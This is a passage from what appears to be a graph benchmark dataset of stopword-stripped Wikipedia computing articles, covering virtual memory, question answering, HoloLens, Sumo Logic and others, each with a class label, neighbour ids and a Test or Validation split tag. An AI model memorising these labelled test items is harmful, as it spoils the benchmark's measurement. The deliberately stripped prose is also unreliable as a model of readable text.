simple world rules physics easy encode computer program 1970s knowledge bases developed targeted narrower domains knowledge question answering systems developed interface expert systems produced repeatable valid responses questions within area knowledge expert systems closely resembled modern question answering systems except internal architecture expert systems rely heavily expert-constructed organized knowledge bases whereas many modern question answering systems rely statistical processing large unstructured natural language text corpus 1970s 1980s saw development comprehensive theories computational linguistics led development ambitious projects text comprehension question answering one example system unix consultant uc developed robert wilensky u.c berkeley late 1980s system answered questions pertaining unix operating system comprehensive hand-crafted knowledge base domain aimed phrasing answer accommodate various types users another project lilog text-understanding system operated domain tourism information german city systems developed uc lilog projects never went past stage simple demonstrations helped development theories computational linguistics reasoning recently specialized natural language question answering systems developed eagli health life scientists wolfram alpha online computational knowledge engine answers factual queries directly computing answer externally sourced curated data 2001 question answering systems typically included question classifier module determines type question type answer multiagent question-answering architecture proposed domain represented agent tries answer questions taking account specific knowledge meta–agent controls cooperation question answering agents chooses relevant answer question answering dependent good search corpus without documents containing answer little question answering system thus makes sense larger collection sizes generally lend well better question answering performance unless question domain orthogonal collection notion data redundancy massive collections web means nuggets information likely phrased many different ways differing contexts documents leading two benefits question answering systems rely heavily automated reasoning number question answering systems designed prolog logic programming language associated artificial intelligence information retrieval open domain question answering system aims returning answer response user question returned answer form short texts rather list relevant documents system uses combination techniques computational linguistics information retrieval knowledge representation finding answers system takes natural language question input rather set keywords example national day china sentence transformed query logical form input form natural language question makes system user-friendly harder implement various question types system identify correct one order give sensible answer assigning question type question crucial task entire answer extraction process relies finding correct question type hence correct answer type keyword extraction first step identifying input question type cases clear words indicate question type directly i.e many words tell system answers type person location number respectively example word indicates answer type date pos part-of-speech tagging syntactic parsing techniques also used determine answer type case subject chinese national day predicate adverbial modifier therefore answer type date unfortunately interrogative words like give clear answer types words represent one type situations like words question need considered first thing find words indicate meaning question lexical dictionary wordnet used understanding context question type identified information retrieval system used find set documents containing correct key words tagger np/verb group chunker used verify whether correct entities relations mentioned found documents questions named-entity recogniser used find relevant person location names retrieved documents relevant paragraphs selected ranking vector space model used strategy classifying candidate answers check answer correct type determined question type analysis stage inference technique also used validate candidate answers score given candidates according number question words contains close words candidate closer better answer translated compact meaningful representation parsing previous example expected output answer 1st oct. recently open source math-aware question answering system based ask platypus wikidata published system takes english hindi natural language question input returns mathematical formula retrieved wikidata succinct answer resulting formula translated computable form allowing user insert values variables names values variables common constants retrieved wikidata available claimed system outperforms commercial computational mathematical knowledge engine test set question answering systems extended recent years encompass additional domains knowledge example systems developed automatically answer temporal geospatial questions questions definition terminology biographical questions multilingual questions questions content audio images video current question answering research topics include ibm question answering system watson defeated two greatest jeopardy champions brad rutter ken jennings significant margin facebook research made drqa system available open source license system used open domain question answering using wikipedia knowledge source",
    "neighbors": [
      5122,
      5639,
      2440,
      2059,
      6798,
      4624,
      10231,
      1044,
      5399,
      538,
      7069,
      416,
      1443,
      3748,
      10541,
      7599,
      1072,
      4531,
      4662,
      3127,
      2488,
      10557,
      3902,
      6208,
      9796,
      5830,
      5319,
      11467,
      3533,
      5197,
      6223,
      10452,
      2901,
      8538,
      5857,
      1890,
      7780,
      8421,
      6374,
      7918,
      8046,
      8688,
      882,
      3698,
      5492,
      119,
      8440,
      6906,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 11539,
    "label": 2,
    "text": "Virtual_memory:virtual memory computing virtual memory also virtual storage memory management technique provides idealized abstraction storage resources actually available given machine creates illusion users large main memory computer operating system using combination hardware software maps memory addresses used program called virtual addresses physical addresses computer memory main storage seen process task appears contiguous address space collection contiguous segments operating system manages virtual address spaces assignment real memory virtual memory address translation hardware cpu often referred memory management unit mmu automatically translates virtual addresses physical addresses software within operating system may extend capabilities provide virtual address space exceed capacity real memory thus reference memory physically present computer primary benefits virtual memory include freeing applications manage shared memory space increased security due memory isolation able conceptually use memory might physically available using technique paging virtual memory makes application programming easier hiding fragmentation physical memory delegating kernel burden managing memory hierarchy eliminating need program handle overlays explicitly process run dedicated address space obviating need relocate program code access memory relative addressing memory virtualization considered generalization concept virtual memory virtual memory integral part modern computer architecture implementations usually require hardware support typically form memory management unit built cpu necessary emulators virtual machines employ hardware support increase performance virtual memory implementations consequently older operating systems mainframes 1960s personal computers early mid-1980s e.g. dos generally virtual memory functionality though notable exceptions mainframes 1960s include operating system apple lisa example personal computer operating system 1980s features virtual memory 1960s early 70s computer memory expensive introduction virtual memory provided ability software systems large memory demands run computers less real memory savings provided strong incentive switch virtual memory systems additional capability providing virtual address spaces added another level security reliability thus making virtual memory even attractive market place modern operating systems support virtual memory also run process dedicated address space program thus appears sole access virtual memory however older operating systems os/vs1 os/vs2 svs even modern ones ibm single address space operating systems run processes single address space composed virtualized memory embedded systems special-purpose computer systems require fast and/or consistent response times may opt use virtual memory due decreased determinism virtual memory systems trigger unpredictable traps may produce unwanted unpredictable delays response input especially trap requires data read main memory secondary memory hardware translate virtual addresses physical addresses typically requires significant chip area implement chips used embedded systems include hardware another reason systems n't use virtual memory 1940s 1950s larger programs contain logic managing primary secondary storage overlaying virtual memory therefore introduced extend primary memory make extension easy possible programmers use allow multiprogramming multitasking many early systems divided memory multiple programs without virtual memory early models pdp-10 via registers concept virtual memory first developed german physicist fritz-rudolf güntsch technische universität berlin 1956 doctoral thesis logical design digital computer multiple asynchronous rotating drums automatic high speed memory operation described machine 6 100-word blocks primary core memory address space 1,000 100-word blocks hardware automatically moving blocks primary memory secondary drum memory paging first implemented university manchester way extend atlas computer working memory combining 16,384 words primary core memory additional 98,304 words secondary drum memory first atlas commissioned 1962 working prototypes paging developed 1959 1961 burroughs corporation independently released first commercial computer virtual memory b5000 segmentation rather paging virtual memory could implemented mainstream operating systems many problems addressed dynamic address translation required expensive difficult-to-build specialized hardware initial implementations slowed access memory slightly worries new system-wide algorithms utilizing secondary storage would less effective previously used application-specific algorithms 1969 debate virtual memory commercial computers ibm research team led david sayre showed virtual memory overlay system consistently worked better best manually controlled systems throughout 1970s ibm 370 series running virtual-storage based operating systems provided means business users migrate multiple older systems fewer powerful mainframes improved price/performance first minicomputer introduce virtual memory norwegian nord-1 1970s minicomputers implemented virtual memory notably vax models running vms virtual memory introduced x86 architecture protected mode intel 80286 processor segment swapping technique scaled poorly larger segment sizes intel 80386 introduced paging support underneath existing segmentation layer enabling page fault exception chain exceptions without double fault however loading segment descriptors expensive operation causing operating system designers rely strictly paging rather combination paging segmentation nearly current implementations virtual memory divide virtual address space pages blocks contiguous virtual memory addresses pages contemporary systems usually least 4 kilobytes size systems large virtual address ranges amounts real memory generally use larger page sizes page tables used translate virtual addresses seen application physical addresses used hardware process instructions hardware handles specific translation often known memory management unit entry page table holds flag indicating whether corresponding page real memory real memory page table entry contain real memory address page stored reference made page hardware page table entry page indicates currently real memory hardware raises page fault exception invoking paging supervisor component operating system systems one page table whole system separate page tables application segment tree page tables large segments combination one page table different applications running time use different parts single range virtual addresses multiple page segment tables multiple virtual address spaces concurrent applications separate page tables redirect different real addresses earlier systems smaller real memory sizes sds 940 used page registers instead page tables memory address translation part operating system creates manages page tables hardware raises page fault exception paging supervisor accesses secondary storage returns page virtual address resulted page fault updates page tables reflect physical location virtual address tells translation mechanism restart request physical memory already use paging supervisor must free page primary storage hold swapped-in page supervisor uses one variety page replacement algorithms least recently used determine page free operating systems memory areas pinned never swapped secondary storage terms used locked fixed wired pages example interrupt mechanisms rely array pointers handlers i/o completion page fault pages containing pointers code invoke pageable interrupt-handling would become far complex time-consuming particularly case page fault interruptions hence part page table structures pageable pages may pinned short periods time others may pinned long periods time still others may need permanently pinned example ibm operating systems system/370 successor systems term fixed pages may long-term fixed may short-term fixed may unfixed i.e. pageable system control structures often long-term fixed measured wall-clock time i.e. time measured seconds rather time measured fractions one second whereas i/o buffers usually short-term fixed usually measured significantly less wall-clock time possibly tens milliseconds indeed os special facility fast fixing short-term fixed data buffers fixing performed without resorting time-consuming supervisor call instruction multics used term wired openvms windows refer pages temporarily made nonpageable i/o buffers locked simply nonpageable never pageable os/vs1 similar oses parts systems memory managed virtual-real mode called v=r mode every virtual address corresponds real address mode used interrupt mechanisms paging supervisor page tables older systems application programs using non-standard i/o management example ibm z/os 3 modes virtual-virtual virtual-real virtual-fixed paging page stealing used problem called thrashing occur computer spends unsuitably large amount time transferring pages backing store hence slowing useful work task working set minimum set pages memory order make useful progress thrashing occurs insufficient memory available store working sets active programs adding real memory simplest response improving application design scheduling memory usage help another solution reduce number active tasks system reduces demand real memory swapping entire working set one processes systems burroughs b5500 use segmentation instead paging dividing virtual address spaces variable-length segments virtual address consists segment number offset within segment intel 80286 supports similar segmentation scheme option rarely used segmentation paging used together dividing segment pages systems memory structure multics ibm system/38 usually paging-predominant segmentation providing memory protection intel 80386 later ia-32 processors segments reside 32-bit linear paged address space segments moved space pages page main memory providing two levels virtual memory operating systems instead using paging early non-hardware-assisted x86 virtualization solutions combined paging segmentation x86 paging offers two protection domains whereas vmm guest os guest applications stack needs three difference paging segmentation systems memory division segmentation visible user processes part memory model semantics hence instead memory looks like single large space structured multiple spaces difference important consequences segment page variable length simple way lengthen address space segmentation provide single-level memory model differentiation process memory file system consists list segments files mapped process potential address space mechanisms provided calls mmap win32 mapviewoffile inter-file pointers work mapping files semi-arbitrary places multics file segment multi-segment file mapped segment address space files always mapped segment boundary file linkage section contain pointers attempt load pointer register make indirect reference causes trap unresolved pointer contains indication name segment pointer refers offset within segment handler trap maps segment address space puts segment number pointer changes tag field pointer longer causes trap returns code trap occurred re-executing instruction caused trap eliminates need linker completely works different processes map file different places private address spaces operating systems provide swapping entire address spaces addition whatever facilities paging segmentation occurs os writes pages segments currently real memory swap files swap-in os reads back data swap files automatically read back pages paged time swap operation ibm mvs os/vs2 release 2 z/os provides marking address space unswappable pin pages address space done duration job entering name eligible main program program properties table unswappable flag addition privileged code temporarily make address space unswappable using sysevent supervisor call instruction svc certain changes address space properties require os swap swap back using sysevent transwap",
    "neighbors": [
      6155,
      2066,
      4114,
      25,
      6180,
      8231,
      52,
      2107,
      2113,
      4161,
      6221,
      8273,
      4178,
      86,
      10333,
      97,
      6247,
      2152,
      6248,
      6252,
      8301,
      2168,
      8315,
      2179,
      8325,
      8333,
      10382,
      6296,
      2201,
      8352,
      8364,
      2224,
      178,
      6329,
      8379,
      4286,
      2241,
      2243,
      8388,
      10436,
      6342,
      10439,
      2248,
      2250,
      2253,
      2264,
      8410,
      6377,
      242,
      10485,
      249,
      2303,
      2304,
      10499,
      10508,
      2317,
      6415,
      273,
      8474,
      292,
      2345,
      2355,
      309,
      8501,
      4409,
      6459,
      8509,
      8514,
      4423,
      4424,
      6476,
      2383,
      4438,
      2391,
      8534,
      8543,
      8545,
      8551,
      363,
      10603,
      4465,
      376,
      8573,
      6529,
      394,
      4492,
      398,
      6543,
      6557,
      2462,
      4513,
      421,
      4521,
      4525,
      10669,
      2480,
      10675,
      10676,
      8631,
      8633,
      466,
      4565,
      2519,
      4586,
      10730,
      10731,
      10734,
      6639,
      8687,
      499,
      4596,
      8700,
      6652,
      2560,
      6664,
      2571,
      10776,
      541,
      4637,
      10781,
      4643,
      6705,
      10803,
      10809,
      2623,
      576,
      2625,
      6730,
      2638,
      4695,
      10839,
      2653,
      6760,
      10856,
      8815,
      6772,
      630,
      4727,
      8822,
      634,
      639,
      10883,
      4747,
      10891,
      6797,
      6815,
      6818,
      10916,
      6821,
      8879,
      6837,
      8889,
      8890,
      2762,
      6868,
      10966,
      2778,
      731,
      10985,
      8944,
      2804,
      757,
      2805,
      2813,
      8966,
      6920,
      6926,
      8977,
      787,
      789,
      6950,
      814,
      11059,
      823,
      6974,
      4928,
      11075,
      6988,
      850,
      9044,
      868,
      4968,
      9066,
      7020,
      2933,
      7032,
      7033,
      7039,
      11147,
      7053,
      5008,
      7057,
      5022,
      11171,
      9126,
      935,
      11184,
      9141,
      9151,
      11204,
      11205,
      3014,
      9166,
      5074,
      11218,
      5080,
      5090,
      995,
      3049,
      5105,
      5115,
      5120,
      1025,
      7173,
      11278,
      7187,
      7217,
      7218,
      5176,
      7234,
      3142,
      9300,
      1109,
      3160,
      1122,
      11363,
      7269,
      3175,
      7285,
      9335,
      1147,
      3197,
      1150,
      5247,
      11390,
      1158,
      7302,
      7313,
      9370,
      3235,
      9391,
      9393,
      11444,
      7351,
      1213,
      1219,
      5328,
      5329,
      7382,
      9436,
      1247,
      11489,
      3300,
      7403,
      5356,
      9452,
      5358,
      5363,
      9466,
      3323,
      9468,
      1278,
      5378,
      5380,
      1298,
      9490,
      5397,
      1323,
      3371,
      7477,
      7483,
      9547,
      5452,
      11596,
      5457,
      7505,
      7507,
      11604,
      7511,
      9563,
      1376,
      3426,
      5484,
      11635,
      5492,
      11637,
      1399,
      1402,
      3457,
      7561,
      3470,
      9616,
      5523,
      11675,
      1445,
      9643,
      7601,
      1461,
      1462,
      1463,
      3512,
      7607,
      9655,
      1474,
      1499,
      1502,
      5598,
      9707,
      5619,
      9739,
      7699,
      5655,
      9756,
      3615,
      9762,
      3619,
      1576,
      7728,
      1592,
      1593,
      9791,
      5714,
      7762,
      9829,
      9835,
      3702,
      3725,
      9882,
      9887,
      5793,
      7852,
      7858,
      9907,
      9911,
      5823,
      1736,
      9932,
      5840,
      7911,
      9964,
      1776,
      9978,
      1798,
      1801,
      1804,
      3859,
      3871,
      10016,
      5933,
      7983,
      10040,
      5948,
      7999,
      5976,
      1902,
      10104,
      8063,
      10113,
      1922,
      8066,
      8069,
      3978,
      1954,
      1967,
      4030,
      6078,
      6084,
      6087,
      4040,
      8136,
      2015,
      4075,
      8175,
      6128,
      2035,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 11540,
    "label": 8,
    "text": "Sarvega:sarvega sarvega intel-owned company provided xml appliances intel purchase announced aug. 17th 2005 company brought intel software services group ssg global 1000 organizations using sarvega xpe switches include fujitsu health care supplier mt sinai hospital systems reactivity westbridge technology sarvega also trying establish security appliances product developing maintaining safety policy settings xml appliance",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 11541,
    "label": 7,
    "text": "Prova:prova prova open source programming language combines prolog java prova rule-based scripting system used middleware language combines imperative declarative programming using prolog syntax allows calls java functions way strong java code base combined prolog features backtracking prova derived mandarax java-based inference system developed jens dietrich prova extends mandarax providing proper language syntax native syntax integration java agent messaging reaction rules development language supported grant provided within eu projects genestream biogrid project language used rule-based backbone distributed web applications biomedical data integration particular gopubmed system design goals prova prova aims provide support data integration tasks following important prova used key service integration engine xcalia product used computing efficient global execution plans across multiple data sources web services tp monitors transactions like cics ims messages mom like mq-series packaged applications jca connector legacy data sources mainframes jca connector remote ejb java objects considered data providers even local java objects prova allows deliver innovative software platform service-oriented architecture implementations",
    "neighbors": [
      9988,
      8421,
      8262,
      8582,
      4107,
      5677,
      11024,
      9780,
      8122,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 11542,
    "label": 4,
    "text": "Sumo_Logic:sumo logic sumo logic cloud-based machine data analytics company focusing security operations bi usecases provides log management analytics services leverage machine-generated big data deliver real-time insights headquartered redwood city california sumo logic founded april 2010 arcsight veterans kumar saurabh christian beedgen received funding accel partners dfj growth greylock partners institutional venture partners sequoia capital sapphire ventures sutter hill ventures angel investor shlomo kramer battery ventures tiger global management franklin templeton may 2019 company collected vc funding totaling 345 million sumo logic architecture features elastic petabyte scale platform collects manages analyzes enterprise log data reducing millions log lines operational security insights real time cloud-based approach overcomes inherent problems premises-based solutions including limits scalability inefficient haphazard analysis uncontrolled costs sumo logic built around globally distributed data retention architecture keeps log data available instant analysis eliminating need enterprise manage cost complexity data archiving backups restoration service entirely cloud-based maintenance free instead inelastic security information event management systems sumo logic employs elastic processing collect manage analyze log data regardless type volume location sumo logic modeled approach google according christian beedgen company cto one co-founders using advanced machine-learning algorithms whittle mountains log file data common groupings sumo logic platform mirrors google news categorization news stories distributed across web sumo logic able ease process administrators synthesize analyze data june 2012 sumo logic announced sumo logic free freemium full functionality edition analytical solution deployed amazon web services august 2012 company announced sumo logic vmware allows enterprises search visualize analyze vmware logs real time monitor detect events within vmware virtual environments 2016 sumo logic launched data analytics platform unifies logs metrics analyze structured metrics data unstructured log data real-time graphical interactive dashboards aws 2017 conference sumo logic presented machine data analytics service combines analytics docker kubernetes service streamlines data ingestion sumo logic machine data analytics service hosted amazon web services 2018 sumo logic announced expansion integrations google cloud platform releasing integrations gcp applications integration tensorflow september 2018 sumo logic announced addition cloud siem solution machine data analytics platform sumo logic works pokémon company provide analytics pokémon go including threats security vulnerabilities log aggregation security analytics april 2019 sumo logic launched bidirectional integration atlassian ’ opsgenie incident alert service integration gives users ability create analyze alerts incident data sumo logic remained stealth mode two years unveiled cloud-based log management platform series b funding 15 million january 2012 round series e funding announced june 2015 brings company total venture capital backing 160.5 million june 27 company closed series f round 75 million path ipo may 2019 sumo logic announced 110 million series g investment indicated valuation north billion dollars sumo logic founded 2010 technical leadership team expertise log management scalable systems big data security including ramin sayar formerly vmware sumo logic ceo since december 2014 previously vance loiselle formerly bladelogic ceo may 2012 december 2014 april 2012 sumo logic formed new advisory board bringing three silicon valley veterans dj patil greylock partners gerhard eschelbeck sophos nir zuk palo alto networks sumo logic service powered patent-pending elastic log processing logreduce push analytics technologies january 2012 rsa named sumo logic one top 10 finalists innovative company rsa april 2012 radar conference sumo logic received judge choice audience choice awards performance monitoring may 2012 sumo logic named red herring americas 2012 top 100 winner may 7 2014 sumo logic named cool vendor gartner application performance monitoring apm operations analytics itoa categories",
    "neighbors": [
      4194,
      11429,
      2558,
      6153,
      4234,
      3661,
      2765,
      7248,
      11611,
      3125,
      9055,
      11577,
      7802,
      7899,
      2910,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 11543,
    "label": 4,
    "text": "Allway_Sync:allway sync allway sync backup file synchronization software allows backing synchronizing files different drives different media cd dvd flash zip remote server various versions users freeware version requested buy pro version use software commercial purpose synchronize 40,000 files 30-day period pro version exactly functionality free version",
    "neighbors": [
      9025,
      7364,
      5413,
      3366,
      1801,
      10476,
      1358,
      6062,
      7983,
      2193,
      11633,
      4574
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11544,
    "label": 4,
    "text": "Jack_Dunlap:jack dunlap jack edward dunlap november 14 1927 – july 23 1963 united states army sergeant stationed national security agency later became spy soviet union early 1960s army sergeant assigned nsa subject polygraph examination retired army soviet handlers told apply civilian position given polygraph examination nsa friday passed examination examiner told fbi something made uneasy told dunlap come back monday dunlap committed suicide weekend carbon monoxide poisoning director security nsa told fbi agents assistant paid visit dunlap widow offer condolences said probably want papers showing classified material nsa realized dunlap spy dunlap personable individual roamed around within nsa one secretary told fbi stopped desk chat would see papers box tell headed direction take papers would stop xerox machine way make copy soviets",
    "neighbors": [
      9856,
      7887,
      5183
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11545,
    "label": 2,
    "text": "Nokia_E7-00:nokia e7-00 nokia e7-00 also known nokia e7 business-oriented qwerty smartphone nokia nokia eseries announced nokia world september 2010 together nokia c6-01 nokia c7 started shipping february 2011 second phone nokia n8 running symbian^3 operating system compared nokia n8 fixed mass storage 16gb without memory card slot fm transmitter less advanced camera extended depth field instead autofocus n8 e90 like nokia n8 comes hdmi-out connector non-user-replaceable battery smaller e90 keyboard spring mechanism nokia n97 mini like n8 anodized aluminium casing different bulkier heavier e90 compared nokia n97 mini e90 e7-00 multitouch capacitive touchscreen unlike n8 n97 mini e90 e7-00 active-matrix oled amoled clearblack technology slightly lower resolution e90 vlasta berka general manager nokia singapore malaysia brunei talked trend users using smartphones business parliament finland bought 200 e7s spring 2011 late april 2012 50 phones serviced warranty fixed os update e7 battery user-removable although unofficial online tutorials replace battery exist",
    "neighbors": [
      1537,
      4609,
      8577,
      6276,
      3205,
      11271,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      4003,
      4132,
      6310,
      167,
      40,
      1833,
      3626,
      5290,
      10410,
      9137,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1216,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      2383,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      737,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      9964,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11546,
    "label": 2,
    "text": "Windows_Mixed_Reality:windows mixed reality windows mixed reality mixed reality platform introduced part windows 10 operating system provides holographic mixed reality experiences compatible head-mounted displays flagship device microsoft hololens announced windows 10 next chapter press event january 21 2015 provides mixed reality experience live presentation physical real-world elements incorporated virtual elements referred holograms microsoft perceived exist together shared environment variant windows augmented reality computers augment real-world physical environment virtual elements windows mixed reality features augmented-reality operating environment universal windows platform app run platform also used virtual reality headsets designed use windows 10 fall creators update built specifications implemented part windows mixed reality lack support holographic experiences premier device windows mixed reality microsoft hololens smart-glasses headset cordless self-contained windows 10 computer running windows 10 holographic uses various sensors high-definition stereoscopic 3d optical head-mounted display spatial sound allow augmented reality applications natural user interface user interacts gaze voice hand gestures codenamed project baraboo hololens development five years announcement 2015 conceived earlier original pitch made late 2007 would become kinect technology platform microsoft targeted hololens release windows 10 timeframe microsoft hololens development edition begin shipping march 30 2016 available application developers united states canada list price us 3000 although development edition considered consumer-ready hardware february 2016 microsoft set time frame consumer availability hololens hololens chief inventor alex kipman stating hololens consumer release market ready companies samsung electronics asus expressed interest working microsoft produce mixed-reality products based hololens intel made direct competitor called project alloy system called merged reality however cancelled september 22 2017 october 2016 hardware event microsoft announced multiple oems would release virtual reality headsets windows holographic platform based microsoft reference designs enabling room-scale virtual reality without external sensors components january 2017 prototypes presented consumer electronics show release later year microsoft later announced planned release development kits headsets game developers conference devices would supported windows 10 creators update game developers conference 2017 microsoft stated intended support windows mixed reality headsets xbox one 2018 specifically noting capabilities then-upcoming xbox one x hardware revision company later stated initially focusing pc platforms first wanted focus wireless vr solutions consoles october 2017 microsoft officially launched windows mixed reality lineup third-party headsets use windows 10 fall creators update including launch lineup headsets acer dell hp lenovo future products asus samsung officially referred windows mixed reality immersive headsets unlike hololens devices compatible virtual reality software underlying ecosystem referred windows mixed reality regardless experience immersive headsets feature integrated motion tracking eschewing standalone sensors contain cameras used track handheld motion controller accessories may bundled headset distributed optional accessories immersive headsets currently compatible mixed reality software obtained microsoft store universal apps software using steam virtual reality platform used htc vive ability run desktop software added windows 10 may 2019 update microsoft classifies minimum recommended system requirements windows mixed reality windows mixed reality pcs 60 fps windows mixed reality ultra pcs 90 fps minimum requirements specify intel core i5-7200u better laptops 8 gb ram intel hd graphics 620 better directx 12 support usb 3.0 hdmi displayport connections bluetooth 4.0 support controllers verge noted users wo n't need high-end gaming pc meet recommendations mixed reality portal universal windows platform app serves front-end windows mixed reality features 3d environment users explore customize application shortcuts virtual desktops feature originally launched one environment cliff house second skyloft added april 2018 update",
    "neighbors": [
      10243,
      11270,
      5643,
      4624,
      10769,
      1043,
      537,
      540,
      3102,
      1055,
      9762,
      2083,
      8227,
      8740,
      1577,
      10281,
      4143,
      9263,
      11316,
      1077,
      2101,
      8246,
      10812,
      3648,
      582,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9812,
      9813,
      10839,
      603,
      9819,
      2145,
      3170,
      8296,
      8299,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      9340,
      10879,
      5761,
      5765,
      10886,
      2183,
      8841,
      5259,
      653,
      5262,
      6797,
      2193,
      9874,
      10388,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      5300,
      7351,
      10428,
      2749,
      194,
      2244,
      8391,
      200,
      9420,
      10957,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      10991,
      10993,
      2804,
      3834,
      1791,
      8959,
      11519,
      6415,
      3856,
      6927,
      9491,
      3351,
      5401,
      8473,
      8985,
      8988,
      11549,
      4384,
      5413,
      2854,
      11559,
      5928,
      3881,
      6441,
      10024,
      10026,
      10029,
      7983,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      1348,
      9033,
      844,
      3922,
      4439,
      5465,
      10079,
      11616,
      9057,
      2402,
      2919,
      4458,
      6506,
      9066,
      1400,
      9593,
      2943,
      9609,
      1418,
      5003,
      5004,
      9612,
      8080,
      9114,
      11677,
      10654,
      8607,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      2493,
      960,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      9196,
      6637,
      4590,
      9709,
      6641,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 11547,
    "label": 2,
    "text": "360_Web_Browser:360 web browser 360 web browser web browser created digital poke ios operating system launched october 2010 360 offers tabbed browsing downloading firefox sync themes file manager unrar/unzip capabilities major competitors 360 web browser safari google chrome atomic mercury",
    "neighbors": [
      4849,
      5078,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11548,
    "label": 1,
    "text": "NIOSH_Power_Tools_Database:niosh power tools database niosh power tools database contains sound power levels sound pressure levels vibrations data variety common power tools tested researchers data collected unloaded loaded use power tools database created national institute occupational safety health niosh database created order provide information general public sound vibrations generated power tools use many tools produce sound levels high enough damage hearing precautions taken since information readily available cases niosh created power tools database ran tests power tools provide information according niosh power tools database particularly helpful determining 'real-world noise level power tools used job database part much larger hearing loss prevention research program conducted niosh hearing loss prevention research program designed reduce occupational hearing loss research application research real-world situations database advances goal informing buyers users power tools dangerous levels noise vibrations exposed using tools making people aware loud power tools actually niosh attempting encourage design production quieter power tools proper use hearing protectors using tools database also part larger niosh prevention initiative called buy quiet recent years buy quiet programs initiatives arisen effort combat occupational noise exposures programs promote purchase quieter tools equipment noise-induced hearing loss nihl increasingly common disorder often caused work-related activities construction manufacturing mining susceptible occupations nihl since many workers fields exposed high levels noise daily basis substantial part noise results use power tools produce dangerous levels noise although loudness power tools may quite apparent using actual level noise produced mostly unreported available easily online reference database provides detailed information noise levels appropriate action may taken protect workers information database originates testing done power tools niosh researchers testing conducted accordance iso 3744 ansi s12.15 calibration testing equipment performed tests begin tests conducted semi-anechoic chamber test setup includes ten-microphone array accelerometer case testing power tools unloaded condition tool suspended cables set operate full speed loaded condition tool used researcher perform task designed another researcher runs data acquisition programs data collected verified analyzed entered niosh power tools database currently niosh power tools database contains sound vibrations data 166 power tools including 11 different types tools 18 manufacturers testing additional power tools progress database updated reflect new data acquired database part niosh buy quiet efforts aimed helping companies buy less noisy equipment result less hearing loss online resources include practical guide noise meter showing length time exposure various everyday noises becomes hazardous employee training videos",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 11549,
    "label": 2,
    "text": "Microsoft_HoloLens:microsoft hololens microsoft hololens known development project baraboo pair mixed reality smartglasses developed manufactured microsoft hololens first head-mounted display running windows mixed reality platform windows 10 computer operating system tracking technology used hololens trace lineage kinect add-on microsoft xbox gaming console introduced 2010 pre-production version hololens development edition shipped march 30 2016 targeted developers united states canada list price 3000 samsung asus extended offer microsoft help produce mixed-reality products collaboration microsoft based around concept hardware hololens october 12 2016 microsoft announced global expansion hololens publicized hololens would available preorder australia ireland france germany new zealand united kingdom also commercial suite similar pro edition windows enterprise features bitlocker security may 2017 suite sells 5,000 microsoft decided rent hololens without clients making full investment microsoft partner company called abcomrents give service hololens rental hololens 2 announced mobile world congress barcelona spain february 24 2019 available preorder 3500 hololens head-mounted display unit connected adjustable cushioned inner headband tilt hololens well forward backward wear unit user fits hololens head using adjustment wheel back headband secure around crown supporting distributing weight unit equally comfort tilting visor towards front eyes front unit houses many sensors related hardware including processors cameras projection lenses visor tinted enclosed visor piece pair transparent combiner lenses projected images displayed lower half hololens must calibrated interpupillary distance ipd accustomed vision user along bottom edges side located near user ears pair small red 3d audio speakers speakers competing typical sound systems obstruct external sounds allowing user hear virtual sounds along environment using head-related transfer functions hololens generates binaural audio simulate spatial effects meaning user virtually perceive locate sound though coming virtual pinpoint location top edge two pairs buttons display brightness buttons left ear volume buttons right ear adjacent buttons shaped differently—one concave one convex—so user distinguish touch end left arm power button row five small individual led nodes used indicate system status well power management indicating battery level setting power/standby mode usb 2.0 micro-b receptacle located along bottom edge 3.5 mm audio jack located along bottom edge right arm hololens features inertial measurement unit imu includes accelerometer gyroscope magnetometer four environment understanding sensors two side energy-efficient depth camera 120°×120° angle view 2.4-megapixel photographic video camera four-microphone array ambient light sensor addition intel cherry trail soc containing cpu gpu hololens features custom-made microsoft holographic processing unit hpu coprocessor manufactured specifically hololens microsoft soc hpu 1gb lpddr3 share 8mb sram soc also controlling 64gb emmc running windows 10 operating system hpu uses 28 custom dsps tensilica process integrate data sensors well handling tasks spatial mapping gesture recognition voice speech recognition according alex kipman hpu processes terabytes information one attendee estimated display field view demonstration units 30°×17.5° interview 2015 electronic entertainment expo june microsoft vice-president next-gen experiences kudo tsunoda indicated field view unlikely significantly different release current version hololens contains internal rechargeable battery average life rated 2–3 hours active use 2 weeks standby time hololens operated charging hololens features ieee 802.11ac wi-fi bluetooth 4.1 low energy le wireless connectivity headset uses bluetooth le pair included clicker thumb-sized finger-operating input device used interface scrolling selecting clicker features clickable surface selecting orientation sensor provides scrolling functions via tilting panning unit clicker features elastic finger loop holding device usb 2.0 micro-b receptacle charging internal battery 2016 number augmented-reality applications announced showcased microsoft hololens collection applications provided free developers purchasing microsoft hololens developer edition applications available launch include applications announced showcased hololens include developed collaboration jpl onsight integrates data curiosity rover 3d simulation martian 